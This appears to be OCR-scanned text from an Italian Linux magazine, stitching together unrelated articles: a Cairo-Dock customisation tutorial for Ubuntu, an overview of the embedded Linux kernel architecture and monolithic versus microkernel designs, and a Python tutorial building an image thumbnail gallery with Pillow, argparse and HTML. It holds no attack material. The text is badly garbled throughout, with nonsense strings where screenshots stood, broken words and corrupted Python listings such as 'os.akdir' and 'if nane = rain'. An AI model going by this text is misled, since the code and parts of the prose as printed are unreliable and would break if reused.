comparire la nostra nuova dock. 
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sono a bizzeffe. Ma fra queste, la soluzione più completa, stabile 
e altamente personalizzabile è Cairo-Dock, ormai da anni scelta 
da un numero abbastanza elevato di utenti. E se pensiamo che la 
sua installazione e configurazione sia complessa ci sbagliamo di 
grosso. Bastano davvero pochi clic per renderla subito operativa e 
per attivare il tema grafico che più ci piace. Cos'altro aspettiamo? 
Rimbocchiamoci le maniche e mettiamoci subito a lavoro! 


UTENTE ROOT 

Inseriamo la password di amministrazione del siste- 

ma. Confermiamo con un clic su Autentica. Attendia- 
mo la fine del download e il completamento dell'installazione. 


ANCHE ALL'AVVIO! 

Con un clic destro sulla Cairo Dock spostiamo- 

ci in Cairo-Dock: da qui possiamo personaliz- 
zarla. Quello che ci interessa è Lancia Cairo-Dock all'av- 
vio: da ora in poi la dock si avvierà automaticamente. 
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Personalizzazione a gogò 
In pochi clic possiamo settare la dockbar come più ci aggrada. Ecco come fare 


COME LA VUOI TU 
1 Effettuiamo un clic destro su un punto qualsiasi 
della dockbar. Spostiamoci nel menu Cairo-Dock 
e da qui scegliamo la voce Configura: è da qui che possia- 
mo settare la barra come meglio preferiamo (comporta- 
mento, aspetto e applet da attivare). 


Mi RIRIEL CIA SERATA PISELAIBNA_ MZ 0) ene Atto 
zione i? Temi 


Semprein primo piano 
Riserve spazio per la dock 
Mantieni la dock al di sotto 
Nascondi la dock qua si sovrappone alla finestra attuale 
Mantieri la dock nascosta 


Visualizza con una combinazione veloce 


Appare supra il mouse v 


«..AVANTI 0 DIETRO 
03 Spostiamoci ora nella sezione Visibilità della 
dock principale (sempre presente in Comporta- 
mento). Dal menu Visibilità scegliamo la voce che più 
ci interessa (ad esempio, Nascondi la dock ogni volta che 
si sovrappone ad una finestra]. 


€ configurazione in Temi TE c== 
awrrtheme 


GNOME 


iighContrast 


ttumanity Mark 

icone personalizzare 
Loginicor 
UbuntubMono-Dark 
Ubuntubtono Light 
unityicontieme 


uNitywebappi application 


sn ar 


QUALI ICONE SCEGLIERE? 
05 Possiamo ora spostarci nel tab Aspetto. 
Anche le icone presenti sulla dock possono 
essere personalizzate. Scegliamo uno dei temi elen- 
cati nel menu a tendina Scegli un tema per le icone (nel 
nostro caso abbiamo optato per Humanity). 


Configurazione {A Temi 


SOPRA O SOTTO... 
02 Nella nuova finestra che appare, spostiamoci 
nel tab Comportamento. Dalla sezione Posizio- 
namento sullo schermo selezioniamo basso, alto, destra 
o sinistra in corrispondenza di Scegli su quale lato dello 
schermo posizionare la dock. 


Li Nessuna 
Nascondì la dock ogni volta che s 


2 Sposta in basso 


Semi trasparente 
Diminuisci l'ingrandimento 


Raggruppamento 
TAPPI spa e | 


integrata + 


EFFETTI GRAFICI 
04 Oltre alla visibilità sullo schermo, possiamo 
impostare degli effetti che verranno utilizzati per 
nascondere la dock [quando ad esempio passa in secondo 
piano). Scegliamo uno di quelli presenti in Effetto usato per 
nascondere la dock (ad esempio, Sfumatura in uscita). 


e i Temi 

Mumanity Arcobaleno | 
Curva | 
Panne! | 

Paradolica 

Predefinito 

osriment 

VISTA 3D02D? 


06 Sempre nel tab Aspetto abbiamo la possibilità 
di scegliere che tipo di visualizzazione avere 
{3D, a pannello, a scorrimento, ecc.). Spostiamoci in 
Viste e da qui indichiamo la nostra preferenza in Scegli 
la vista predefinita per le dock principali. 


i 


ent) attiudi i deg x lu 
ci —- 
é » arametri esta 
ELEMENTI ATTUALI 


Accediamo al menu Configura della nostra dock- 

bar [clic destro sulla barra seguito da Cairo- 
Dock). Nella nuova finestra che appare, clicchiamo sulla 
voce Elementi Attuali. Vengono qui elencate tutte le icone 
attualmente fissate sulla dockbar. 


TEMI PER TUTTI! 

Cairo-Dock viene fornita con numerosi temi grafici, 

alcuni realizzati dagli sviluppatori stessi, altri da 
utenti che hanno deciso di condividere i loro lavoro con la 
comunità. Spostiamoci nel tab Temi, scegliamo quello che 
più preferiamo e attiviamolo con un clic su Applica. 


popoo 


Lal 
k 
- 
- 
“” 
Lal 


ECCO LE SCORCIATOIE! 

Con un clic sul pulsante Scorciatoie si apre una 

nuova sezione nella quale vengono elencate 
tutti i lanciatori presenti (hard disk esterni collegati, 
altre partizioni del disco o accesso diretto alle cartelle 
Documenti, Musica, ecc]: una visione molto ordinata! 


i o € Cairo-Déck 


NUOVI LANCIATORI 

Se vogliamo aggiungere dei nuovi lanciatori, 

spostiamoci nel tab Componenti aggiuntivi. Per 
inserire nella dockbar il Cestino, ad esempio, ricerchiamola 
nell'elenco che appare e attiviamo il segno di spunta pre- 
sento accanto alla voce stessa. 


cbrteato LAMW), 
Ut PROC ANIMI 


ANCHE | WIDGET! 

Oltre ad una dockbar altamente personalizza- 

bile, Cairo-Dock include dei widget che possono 
essere d'aiuto per tenere sempre sotto controllo lo stato 
del PC. Ecco come appare, ad esempio, Cairo-Dock a 
seguito della nostra personalizzazione. 


TE JI 
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MENU DELLE APPLICAZIONI 

La prima icona a partire da sinistra ci permet- 

te di accedere al menu delle applicazioni, una 
visualizzazione in pieno stile GNOME 2. Così facendo, 
possiamo addirittura mettere da parte la barra laterale 
di Ubuntu ed affidarci unicamente a Cairo-Dock. 


ti 


I kernel Linux fornisce il supporto per la gestione della memoria, 

per i meccanismi di comunicazione tra processi e per la gestione 

degli interrupt e della rete TCP/IP. La struttura della directory se- 
para il codice dipendente dall'architettura consentendo una maggiore 
affidabilità con algoritmi di base e con chiamate a codice specifico per 
particolari piattaforme. In questo modo, l’aggiunta per il supporto alle 
funzioni specifiche del dispositivo è abbastanza semplice. La maggior 
parte dei fornitori di desktop GNU/Linux, forniscono il kernel come 
parte delle loro distribuzioni. Tali kernel includono il supporto per la 
vasta gamma di dispositivi hardware disponibili all'interno dei mo- 
derni sistemi computing. Molte di queste funzionalità sono costruite 
in moduli runtime-loadable, richiesti da una varietà di strumenti au- 
tomatizzati al rilevamento di dispositivi hardware. Questo approccio 
consente ai fornitori di GNU/Linux di supportare una vasta gamma di 
sistemi con un singolo pacchetto kernel precompilato. A differenza dei 
loro desktop, server o controparti aziendali, i sistemi Linux embedded 
di solito non dispongono di kernel predefiniti. Le ragioni di ciò sono 
molteplici, come ad esempio l'incapacità per i kernel generici di gesti- 
re alcuni sistemi embedded personalizzati, così come di mantenere la 
configurazione del kernel il più semplice possibile. Una configurazione 
più semplice è più facile da definire e, di solito, richiede un ingom- 
bro ridotto di risorse. Come ogni progetto Open Source, il Kernel è in 
continua evoluzione: aggiornamenti di moduli per un nuovo hardware 
rappresentano le principali modifiche che vengono apportate. I sistemi 
GNU/Linux supportano gran parte dell’hardware per PC attualmente 
disponibile in commercio, e il suo codice Open flessibile lo rende mo- 
dificabile ed adattato ai vari sistemi personalizzati. La flessibilità di tali 
sistemi si adatta molto bene alle tecnologie embedded in vari campi di 
controllo e gestione industriale. 


SELEZIONE DEL KERNEL 


La progettazione di sistemi embedded richiede un hardware com- 
patibile con il sistema operativo scelto, ovvero GNU/Linux. La 
scelta della distribuzione comporta modifiche varie e configura- 
zioni essenziali per adattarlo alle funzionalità richieste. Quando si 
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LINUX EMBEDDED: 


ANALISI 
DEL KERNEL 


Il Kernel è il cuore di tutti gli 0S, responsabile di tutte le 
funzioni essenziali del sistema, supporta il multitasking e la 
i o sua flessibilità lo rende adatto a molti sistemi embedded 
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inizia a lavorare con GNU/Linux, più di un kernel sono disponibili 
per il download dal sito ufficiale (Www.Kernel.org). Ci sono varie 
versioni opportunamente datate, destinate ad essere utilizzate in 
varie distribuzioni del sistema Linux. Una vecchia serie (ad esem- 
pio la 2.4) è ancora in uso in molti dispositivi e talvolta viene 
aggiornato con versioni di manutenzione. Lo sviluppo del kernel 
Linux per dispositivi embedded, tende ad essere diviso secondo 
l'architettura del processore in questione. Ad esempio, Russell 
King guida un gruppo di sviluppatori che attivamente sviluppano 
Linux per i dispositivi ARM-based (www.arm.linux.org.uk). Gli 
sviluppatori ARM basano il loro lavoro sul kernel Linux origina- 
rio e sviluppano patch specifiche per ARM. Queste patch del codi- 
ce sorgente consentono un nuovo supporto hardware e correggono 
i bug esistenti che interessano l'architettura ARM nel kernel up- 
stream. Di volta in volta, queste patch sono incluse nei vari kernel 
attraverso un processo automatizzato. 

Il kernel Linux 2.4 è senza dubbio non più rilevante per nuovi 
progetti embedded, come è stato da tempo sostituito dalla più re- 
cente versione 2.6. Anche se il kernel della serie 2.6 è conosciuto 
soprattutto per i suoi miglioramenti per server di grandi dimen- 
sioni, si aggiunge anche un ricco set di opzioni di configurazione 
per dispositivi embedded con risorse limitate. Nonostante i molti 
vantaggi di utilizzare un kernel 2.6, ha preso molto tempo affin- 
ché diventasse un punto fermo per i nuovi sistemi embedded. La 
scelta di una versione del kernel dipende da molti fattori quali: 
applicazione, hardware e costi. Non sempre una nuova versione 
può rappresentare un'ottima scelta. 

Il mainstream serie 2.6 del kernel Linux è generalmente disponi- 
bile dal sito www.kernel.org. Un rilascio ufficiale del kernel è ge- 
neralmente preferito quando si tratta di nuovi progetti embedded; 
l'obiettivo generale di tutti gli sviluppatori è quello di avere le sue 
modifiche in una versione successiva del kernel ufficiale in modo 
che siano immediatamente disponibili per i progetti futuri. Tradi- 
zionalmente, gli sviluppatori embedded hanno scelto una release 
specifica del kernel di Linux e la mantengono fin quando non si 
devono apportare estreme modifiche. 


Il kernel di Linux è multitasking preemptive. Ciò significa che il 
kernel farà una pausa per alcuni compiti al fine di garantire che 
ogni applicazione possa utilizzare la CPU, Ad esempio, se un'ap- 
plicazione è in esecuzione, ma è in attesa di alcuni dati, il kernel 
metterà l'applicazione in pausa al fine di consentire ad un altro 
programma di utilizzare le risorse della CPU. In caso contrario, il 
sistema potrebbe sprecare risorse per le attività che sono in attesa 
per i dati o di un altro programma da eseguire. Il kernel, quindi, 
costringerà i programmi ad aspettare o a smettere di usare la CPU. 


ARCHITETTURA DEL KERNEL LINUX 


L'architettura di base del kernel Linux (Fig. | e Fig. 2) è rimasta 
invariata in seguito al susseguirsi delle varie versioni. È basata 
su una distinzione a due livelli: Kernel Space e User Space. In 
User Space risiedono i programmi, mentre nel Kernel Space ri- 
siede appunto il kernel. Quest'ultimo può essere suddiviso in tre 
sottolivelli: system call (read, write), codice del kernel che non 
dipende dall’architettura e codice dipendente dall’architettura del 
sistema (Board Support Package, BSP). La sua architettura può 
essere suddivisa nei seguenti sottosistemi: 


Hardware Abstraction Layer (HAL) 
Memory manager 


Scheduler 


File system 

Sottosistemi I/O (input/output) 
Sottosistemi Networking 

IPC 


Il livello di astrazione hardware (HAL) virtualizza l'hardware del- 
la piattaforma in modo che i diversi driver possono essere porta- 
ti facilmente su qualsiasi hardware. L'HAL è equivalente al BSP 
disponibile sulla maggior parte delle RTOS (Real Time Opera- 
ting System), ad eccezione del fatto che il BSP sulla RTOS com- 
merciale ha normalmente delle API standard che consentono un 
facile porting. L'HAL ha il supporto per i seguenti componenti 


Chiamate a 
servizi 


Notifica eventi 


Gestione hardware 


Notifica eventi 


W Fig. 1 » Kernel Linux nel sistema 
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hardware: processore, cache e MMU, impostazione della mappa 
di memoria, gestione degli interrupt, supporto DMA, gestione del 
bus c power management. 

Nei sistemi embedded, il board support package (BSP) è il codice 
per l'implementazione di una funzione specifica per una data sche- 
da, conforme ad un determinato sistema operativo. È comunemen- 
te costruito con un bootloader che contiene il supporto minimo 
per caricare il sistema operativo e driver di periferica per tutti i 
dispositivi della scheda. Il memory manager è responsabile del 
controllo di accesso alle risorse di memoria hardware e fornisce 
memoria dinamica ai sottosistemi del kernel come driver, file sy- 
stem e stack di rete. Lo scheduler di Linux fornisce le funzionalità 
multitasking e si evolve nel corso delle versioni del kernel con 
l'obiettivo di fornire una politica di pianificazione deterministica 
dei processi. Su Linux, i vari file system sono gestiti da uno stra- 
to chiamato VFS o il file system virtuale che fornisce una visio- 
ne coerente dei dati memorizzati su vari dispositivi del sistema. 
Qualsiasi dispositivo Linux, che si tratti di un sistema embedded, 
di un server o di una postazione desktop, ha bisogno di almeno un 
file system. La necessità dei file system deriva dal fatto che tutti i 
dispositivi di basso livello sono accessibili come file. 


Fig. 2 è Layout generale del kernel Linux 


I sottosistemi I/O su Linux forniscono una semplice ed uniforme 
interfaccia ai dispositivi. Tre tipi di dispositivi sono supportati: 


Character Devices 
Network Devices 
Block Devices 


Uno dei maggiori punti di forza di Linux è il suo robusto supporto 
per diversi protocolli di rete. La comunicazione tra processi su 
Linux comprende segnali (per la comunicazione asincrona), pipe. 
socket, nonché i meccanismi di System V IPC come la memoria 
condivisa e code di messaggi. 

L'accesso diretto all'hardware può essere in generale molto com- 
plesso: i kernel implementano astrazioni hardware come Hardwa- 
re Abstaction Layer, descritto poco fa. Il goal di queste astrazioni 
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è quello di fornire un'interfaccia uniforme al fine di semplificare 
il lavoro degli sviluppatori. In funzione di HAL, il kernel può es- 
sere suddiviso in tre principali categorie: 


Kernel monolitici: implementano direttamente una completa 
astrazione dell’hardware; 

Microkernel: fornisce un insieme ristretto dell’astrazione e im- 
plementano il software per una maggiore funzionalità: 

Kernel ibridi: simili al mierokernel con l'aggiunta di funzioni per 
incrementare le prestazioni. 


KERNEL 0 MICROKERNEL? 


Il Kemel monolitico, come si può intuire dalla Fig. 3, definisce un'in- 
terfaccia virtuale a stretto contatto con l'hardware, tradizionalmente 
utilizzato dai sistemi operativi Unix. Contiene tutte le funzioni prin- 
cipali del sistema operativo e dei driver di periferica, e richiede una 
ricompilazione in caso di aggiunta di nuovi moduli. 


Kernel Monolitico 


M Fig. 3 * Monolitico vs Microkernel 


Un microkernel è stato progettato per una piattaforma o un disposi- 
tivo specifico. L'approccio consiste nel definire una semplice astra- 
zione sopra l'hardware, con un insieme di chiamate di sistema per 
implementare servizi minimi del sistema operativo, come la gestio- 
ne della memoria, multitasking e la comunicazione tra processi. Ciò 
consente una maggiore sicurezza e stabilità derivante dalla ridotta 
quantità di codice in esecuzione nel kernel. I Microkernel sono più 
facili da gestire rispetto ai kernel monolitici, ma il gran numero di 
chiamate di sistema e i cambi di contesto potrebbero rallentare il 
sistema per un numero più alto di chiamate a semplici funzioni. I 
kernel ibridi (Fig. 4) sono simili a microkernel con un codice ag- 
giuntivo al livello di spazio del kernel. Rappresentano un compro- 
messo tra i precedenti, ed è implementato da alcuni sviluppatori di 
sistemi operativi commerciali (Microsoft Windows). 

GNU/Linux è una rappresentazione tipica di un kernel monolitico. Una 
sua modifica delle parti del kernel necessita di una ricompilazione. 
QNXI0 ("Quick Unix") è il sistema operativo (microkernel) più popolare 
per applicazioni in tempo reale. Il kernel di QNX (chiamato neutrino) è 
posix compliant, implementato in C e può essere, quindi, facilmente mo- 
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W Fig. 4 * Architettura di un kernel Ibrido 


dificato su misura per le diverse piattaforme e sistemi operativi. A causa 
della minor complessità del codice, i kernel monolitici sono spesso pre- 
feriti a quelli microkernel e tendono ad essere più semplici da progettare. 
I microkernel vengono utilizzati maggiormente nei sistemi embedded, 
ovvero in applicazioni di automazione o medicali, a causa del fatto che 
i componenti del sistema risiedono in aree di memoria separate, priva- 
te e protette. Un kernel monolitico è strutturato in un unico file, con il 
vantaggio di essere più semplice, a differenza del microkernel che ha una 
struttura più complessa e comunicano attraverso il meccanismo di scambi 
di messaggi. Attraverso la sua struttura, il microkernel vanta un importante 
vantaggio che in caso di blocco di un modulo, il sistema continua la sua 
esecuzione in maniera indipendente (al limite si dovrà riavviare solo quel 
particolare modulo). Questo garantisce maggior semplicità nel supporto 
ver specifici. L'aggiunta di nuove funzionalità, per un sistema monolitico, 
significa ricompilare tutto il kernel, spesso anche l'intera infrastruttura. Ad 
esempio, se si dispone di una nuova routine di gestione della memoria e 
si desidera implementare un'architettura monolitica, potrebbe essere ne- 
cessaria la modifica di altre parti del sistema. Nel caso di un microkernel 
i servizi sono isolati l'uno dall'altro attraverso il sistema dello scambio di 
messaggi: sarà sufficiente re-implementare il nuovo gestore di memoria e i 
processi che in passato hanno utilizzato l’altro gestore non si accorgeranno 
del cambiamento. In questo modo un micro kernel può essere la base sia 
per un sistema operativo desktop, così come per vari sistemi embedded in 
tempo reale e a singolo chip (Fig. 5). 


M Fig. 5 * Gestione della memoria nei kernel monodlitici e 
microkernel 


3 iiaponi os 
i from PIL import Image 


i def _init__ (self, Altezza=200, Larghezza=200): 
self.altezzamAltezza 
self. larghezza=Larghezza 


def generaMiniatura(selfî, Immagine, Percorso): 


try: 
ing=Inage.open(Inmagine) 
Ò lag.thunbnail((self.altezza. self. larghezza), Image. ANTIALIAS) 
Ko. w if (not (os.path.exists(Parcorso)}): 
os.akdir(Percorso) 
1 nomeMin="miniatura"+0s.path.basename (Immagine) 
| 19 fileMin=Percorso+noneMin 
j img.save(fileMin) 


W Fig. 2 * Con le poche righe visibili creeremo e salveremo 
le miniature! 


nei sorgenti, quando ci sarà da definire nuovi aspetti, funzioni e/o 
metodi, li riporteremo nell'articolo. 


CREARE LE MINIATURE 


Per questo scopo utilizziamo un file specifico (quindi un mo- 
dulo ad-hoc) con l'obiettivo di creare le miniature ad una gran- 
dezza prestabilita e salvarle all'interno di una directory indicata 
dall'utente (Fig. 2). Apriamo il file Miniature.py (scaricabile 
dalla pagina http://g00.gl/KrFZ6E) con un qualsiasi editor di testi. 
Nelle prime righe importiamo due moduli. Il primo, di nome 
os, è incluso nella distribuzione standard di Python (modulo 
built-in) e presenta diverse funzioni per la manipolazione di 
file e directory: l'elenco completo lo otteniamo con il comando 
help('os') nell'interprete interattivo. Per il secondo modulo dob- 
biamo assicurarci di aver installato il pacchetto Pillow (Attp:// 
python-imaging.github.io/) un fork di PIL (Python Imaging Li- 
brary) che al momento sembra non essere più sviluppato: ad 
esempio, l'installazione in una Fedora 20 la si ottiene con yum 
install python-pillow. Il pacchetto Pillow fornisce un supporto 
ad un elevato numero di formati di immagini e un insieme di 
potenti metodi che permettono di processarle secondo le proprie 
esigenze. La prima cosa che andiamo a fare è creare una classe 
con due attributi, metodo __init__. che definiscono le dimen- 
sioni della miniatura (impostiamo un valore di default a 200 
x 200 pixel) a cui aggiungiamo un metodo che utilizziamo per 
generare le miniature. Scopriamo come. 

Prima di tutto apriamo l'immagine utilizzando la funzione open 
del modulo Image passandole il percorso: la funzione open per- 
mette anche di identificare il tipo (l'estensione) dell'immagine. 
Impartire help('PIL.Image') per approfondire le potenzialità 
dei metodi e delle funzioni del modulo Image. Il valore di ritor- 
no della funzione open è un oggetto che identifica l'immagine. 
Il ridimensionamento dell'immagine può far uso, escludendo 
aprioristicamente dei metodi di taglio come crop(), di almeno 
due metodi: resize() e thumbnail(). Nel nostro caso faremo uso 
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RITORNO AL FUTURO! 


Importare nuove caratteristiche 


Abbiamo già avuto modo di affrontare l'uso di from 
nell'importazione dei moduli e di come esso vada 
utilizzato in maniera accorta. In questo frangente 
vogliamo mettere in luce la sintassi from __future__ 
import *, che cosa indica? Il modulo _ future __ serve a 
dire all'interprete di utilizzare quel dato comando e/o 
quella data funzione con una semantica e una sin- 
tassi che sarà disponibile in una successiva versione 
di Python! Naturalmente, questa capacità oltre a 
favorire il porting delle applicazioni dalla versione 
2.7.x alla versione 3.x.y permette anche di lanciare 
(limitatamente a quanto supportato, help('_ future__') 
per approfondimenti) gli attuali applicativi in Python2 
con l'interprete Python3. Un esempio: print in Python2 
è un comando mentre in Python3 è una funzione! 
Allora per importare in Python2 la funzione print() di 
Python3 è sufficiente il comando from_ future __ import 
print_function. 


del secondo e il motivo è presto detto. Salviamo un'immagine 
qualunque in una cartella, avviamo una shell e lanciamo l'inter- 
prete interattivo nel quale digiteremo le seguenti righe: 


from PIL import Image 
img=Image.open("/percorso/File.jpg").1 

resize((250,250)) 
img.show() 


Premendo Invio dopo l'ultima riga verrà visualizzata la mi- 
niatura. Senza chiudere l'interprete creiamo una nuova istanza 
dell'oggetto immagine e in luogo del metodo resize() della clas- 
se Image dell'omonimo modulo utilizziamo il metodo thum- 
bnail: 


img=Image.open("File.jpg") 
img.thumbnail((250,250)) 
img.show() 


Di nuovo, dopo l'ultima riga dovrebbe apparirci una piccola fi- 
nestra con l'immagine, ma prima di chiudere l'interprete ripe- 
tiamo le tre righe precedenti solo che la seconda dovrà essere 
riscritta come: 


img.thumbnail((250,250),Image.ANTIALIAS) 


Il risultato di questo semplice esperimento è visibile in Fig. 3. 
L'immagine a destra riporta il risultato del metodo thumbnail 
con antialias e confrontandola con l'immagine centrale, metodo 
thumbnail senza antialias, si potrà notare l'assenza di “seghet- 
tature”. L'immagine a sinistra fa uso del metodo resize: al di là 
delle evidenti “seghettature” (che è sempre possibile limitare 


W Fig. 3 è Metodo resize vs thumbnail vs thumbnail antialias 


applicando l'antialias anche al metodo resize) si potrà notare la 
deformazione dell'immagine poiché non viene mantenuto il rap- 
porto d'aspetto, questo a meno di avere un'immagine di partenza 
quadrata visto il ridimensionamento ad una immagine quadrata 
(miniatura con altezza uguale alla larghezza). Facciamo presen- 
te che il metodo show(), utilizzato principalmente per il debug- 
ging e che prende i due parametri opzionali title e command, 
fa uso del software ImageMagick (www.imagemagick.org) per 
visualizzare le immagini, pertanto assicuriamoci che sia instal- 
lato sulla distribuzione in uso. Ritornando al sorgente di Fig. 
2, all'interno del metodo generaMiniatura, dopo aver aperto 
l'immagine con la funzione open, ne creiamo la miniatura con il 
metodo thumbnail che ci assicurerà immagini rapportate e non 
allungate in una direzione o schiacciate in un'altra! Due osser- 
vazioni a tal riguardo. La prima e il passaggio della tupla (altez- 
za, larghezza) come primo parametro del metodo thumbnail: 
ricordiamo che viene utilizzata la keyword self poiché rappre- 
senta un riferimento ad un oggetto istanziato che nello specifico 
riguarda i valori di default delle dimensioni della miniatura pre- 
senti nel metodo __init__ della classe creaMiniature. 

La seconda, il metodo thumbnail accetta due parametri: size e 
resample, il primo fornito con la tupla e il secondo è opzionale. 
Questo parametro definisce un filtro di campionamento utiliz- 
zato nella creazione della miniatura. Nella versione al momento 
di scrivere se non viene passato nulla di default è utilizzato il 
filtro NEAREST (dato per deprecato dagli sviluppatori): noi 
gli passiamo il filtro ANTIALIAS già dato come parametro di 
default per le prossime versioni di Pillow. È inevitabile pertanto 
la sua applicazione al fine di limitare quanto più possibile le 
“seghettature” nell'immagine ridimensionata. Arrivati a questo 
punto se il percorso passato al metodo generaMiniatura della 
classe creaMiniature del modulo Miniature non dovesse esi- 
stere, e lo verifichiamo con il costrutto if alla riga 25 utilizzando 
la funzione exists() di os.path (ovvero del modulo posixpath, 
help('posixpath') o help('os.path')). verrà creato utilizzando 
la funzione mkdir() del modulo os. Verrà quindi assegnato un 
nuovo nome alla miniatura dell'immagine e solo a questo punto 
verrà salvata nel percorso indicato utilizzando il metodo savel() 
che accetta tre parametri di cui uno obbligatorio (il percorso di 
salvataggio) e due opzionali, comando help('PIL.Image.Ima- 
ge.save') per approfondimenti. 

Per terminare notiamo la presenza del costrutto try: [...] except: 


CR Ra I ao e agli Nodi 


[...] che utilizziamo per intercettare le eccezioni sollevate: per- 
ché prevediamo questa intercettazione e di che tipo di eccezione 
stiamo parlando? L'eccezione è la IOError: cannot identify 
image file e viene sollevata nel momento in cui all'interno della 
cartella delle immagini, delle quali vogliamo crearne le minia- 
ture, vi dovessero essere alcuni file in un formato non gestibile 
da Pillow (ad esempio .pdf, .odt, ecc). Con il costrutto try: ... 
except: ... la intercettiamo facendole eseguire il comando pass, 
letteralmente la ignoriamo. 


COORDINIAMO | LAVORI 


Terminato il modulo per la creazione delle miniature dovremmo 
prevedere un sorgente che coordini i lavori avendo i seguenti 
minimi obiettivi da portare a termine: elencare i file contenuti 
in una cartella al fine di far creare le miniature e quindi gene- 
rare il codice HTML da visualizzare con il browser. In Fig. 4 
sono visibili le poche righe necessarie: al solito ognuno potrà 
organizzarsi al meglio nella creazione dei file e delle classi/ 
funzioni. Nulla di particolare da segnalare poiché per buona 
parte vi sono i commenti, non visibili in figura ma presenti nei 
sorgenti allegati. Ancora una volta solo un paio di osservazioni 
come complemento dei commenti. Alla riga 13 viene utilizzata 
la funzione listdir(path) del modulo os che ritorna una lista di 


Fie: Modifica Visualizza Segnalbri. Collaborative Strumenti Impostazoni Aluto 
Gio Lison falssa isso come @ cdi Hd) Anno MR 


import os, sys, argparse 


isport Mindeture 
lnport GenerabtM 


Wi def coordinalavori(): 
elencoFile=os.listdir(sys.argvit]) 


MW for immagine in elencorile 
absPath=sys.argv[l) + innagina 
GenerasMiniature.creaMiniature() 
Ganera.ganeraMiniatura(absPath.sys.argv[21) 


codìce=GeneraHTM..codiceHTML() 
codice. genaraCodice (sys.argv[2],sys.argv(3]) 


pri def aain(): 
i if len(sys.argv) < + i 
FOLIIE SC IPNTRE ATF OSr Des PI fpercorso/Main.py'. version="0.0.1alpha", description=‘ln È 
semplice menù che ricorda cose lanciare questo programea*, spilog=‘Rilancia il programma rispettando i 
tre argomenti posizionali') È 
parser.add_arguaent('<dir ing>', help="Percorso assoluto alla directory delle inmagini*) 
parser.add'arguaent('<dir thuab>', help=*Percorso assoluto dove salvare le miniature") 
parser.addlarguaent('‘<dir HTMLfile>", helpa*Percorso assoluto dove salvare il file htal*} 
print parser.parse_arys() 

exit(0) 

e else; 
coordinaLavori() 


le if nane = rain" 
maini) 


menu di help 
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stringhe del 
mmagini I Immagine2.jpg', igineN.1 
jpg 
In sostanza ritorna l'elenco di tutti i file, quindi in realtà non 
solo immagir ontenuti nel { so che gli viene passato at- 
ersi ì path: nell'elenco vengono esclu entry 
passata. La uita verrà assegnata alla elenco- 
File che utilizzeremo nel ciclo for della riga 17 al fine di pas- 


i ad una istanza di generazii 


iclic minia- 


tura. Terminata la generazione delle miniature, quindi all'uscita 
del for, verrà creata un'istanza di generazione del codice HTML 
passando i due parametri “percorso assoluto miniature” e “per- 
corso salvataggio file HTML”. L'altra osservazione che ci pre- 


me sottolineare riguarda la funzione main() nella quale si fa uso 


alcuni metodi modulo argparse, un modulo 
che pu ess zato per za 1c ce user- 
genera cente 12c1ungem 
SC 2 e non artire 
comando help('argparse') per approfon Nel nos 
caso 1l programma va lanciato con 
hon Main percori magini pe il 


Visualizza Segnalibri 


Galleria : bash 


impostazioni Aiu 


HTML ENTITIES 
Strani simboli! 


Nei linguaggi di markup come l'HTML una certa 
attenzione va riservata ai caratteri speciali che non 
è possibile digitare da tastiera così come alle lette- 
re accentate e vari segni e simboli grafici che non 
fanno parte dell'alfabeto standard. Questi particolari 
caratteri vanno identificati con una forma specifi- 

ca testuale o numerica [decimale o esadecimale] 
caratterizzata dal carattere & seguito da un codice 
univoco - sequenza di caratteri che garantiscono la 
corretta visibilità del simbolo su tutte le piattaforme 
" {punto e virgola). Ad 
esempio, la lettera accentata “è” viene identificata 


- e terminato dal carattere ‘; 


dalla sequenza &egrave, la lettera "ù” da &ugrave 

mentre la è" da &eacute. Le tabelle complete dei 

simboli possono essere visionate sulla pagina www 
w3schools.com/html/html_entities.asp 


ricordandoci di inserire lo / finale: il programma può essere lan 


ciato con Python2 così come con Python3. Ora, se invece di 


Fig. 5 * Il comando python Main.py --help (o -h) visualizzerà il menu visibile 
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inserire 3 argomenti ne inserissimo 2 ecco che, attraverso l'uso 
della funziona len(object) che ritorna un intero pari al numero 
di voci di una sequenza, nello specifico il numero di argomenti 
passati al programma all'atto del lancio, verrà creata (riga 40) 
dapprima una istanza della classe ArgumentParser() del mo- 
dulo argparse (comando help('argparse,ArgumentParser')), 
quindi verranno aggiunti alcuni argomenti utilizzando il metodo 
add_argument (comando help('argparse.ArgumentParser. 
add_argument')), e per finire ne viene effettuato un parsing 
tramite il metodo parse_args(), help('argparse.Argumen- 
tParser.parse_args'), e stampato in output con print. In so- 
stanza, qualora non si fornissero i tre percorsi sopra riportati, 
verrà visualizzata la scritta: 

usage: python /percorso/Main.py [-h] [-v] <dir img>1 
<dir thumb> <dir HTMLfile> 


python /percorso/Main.py: error: too few arguments 


ad indicarci che sono stati passati pochi argomenti e con un re- 
minder di come usare il programma: ad esempio con python 
Main.py --help (0 -h) verrà visualizzato il menu visibile in Fig. 
5 è con l'opzione -v la versione del programma. 


STRUTTURA DOCUMENTO HTML 


Lungi da noi nel voler spiegare le singole caratteristiche e pro- 
prietà di questo metalinguaggio, che oltremodo esulerebbe da 
questo contesto distogliendo dal principale obiettivo di porta- 
re all'attenzione i diversi aspetti del linguaggio Python. Poiché 
andremo a generare un file HTML allora occorre almeno un 
minimo conoscerne la struttura di base. L'HTML è basato su 
marcatori e HTML entities. I marcatori (noti anche con il nome 
di tag) si identificano con i simboli < e > che definiscono le 


; filedithorne/...Galleria html x \ & 


€ &fiey/home/micha/tmp/®ython-Prove/Gallena html 


M Fig. 6 * Collage di immagini tra Linux Day 2014 e auto d'epoca! 


sezioni del documento HTML. 

Il marcatore di apertura che stabilisce l'inizio della pagina è 
<html> e il corrispondente tag di chiusura, alla fine del docu- 
mento, sarà </html>. Tra questi tag va inserita l'informazione 
che possiamo suddividere in due macro-parti. La sezione depu- 
tata alle intestazioni compresa tra i tag <head> e </head> dove 
possono essere inserite le generalità dell'autore, la descrizione 
della pagina e del documento attraverso l'uso di meta tag (mar- 
catori <meta>) nonché la possibilità di far apparire il titolo del 
documento sulla barra del titolo del browser utilizzando i tag 
<title> e </title>. La seconda macro-sezione definisce il corpo 
del documento e andrà inserito tra i tag <body> è </body>. Una 
tipica struttura minimale, con tag non tutti obbligatori in verità, 
di una pagina HTML può essere la seguente: 


The DOCTYPE declaration defines the document typel 
to be HTML 
<!DOCTYPE html> 
<htmì> 
chead> 
<meta name="Autore"” content=”Autore”> 
<meta name="Keywords" content="Parole chiavil 
separate da virgola”> 
<meta name="Description” content="“Descrizionel 
del sito”> 
<title>Titolo della pagina</title> 
</head> 
<body> 
*** Corpo del documento *** 
</body> 
</html> 


La dichiarazione DOCTYPE definisce che il tipo di documento 


atea s f + O = 
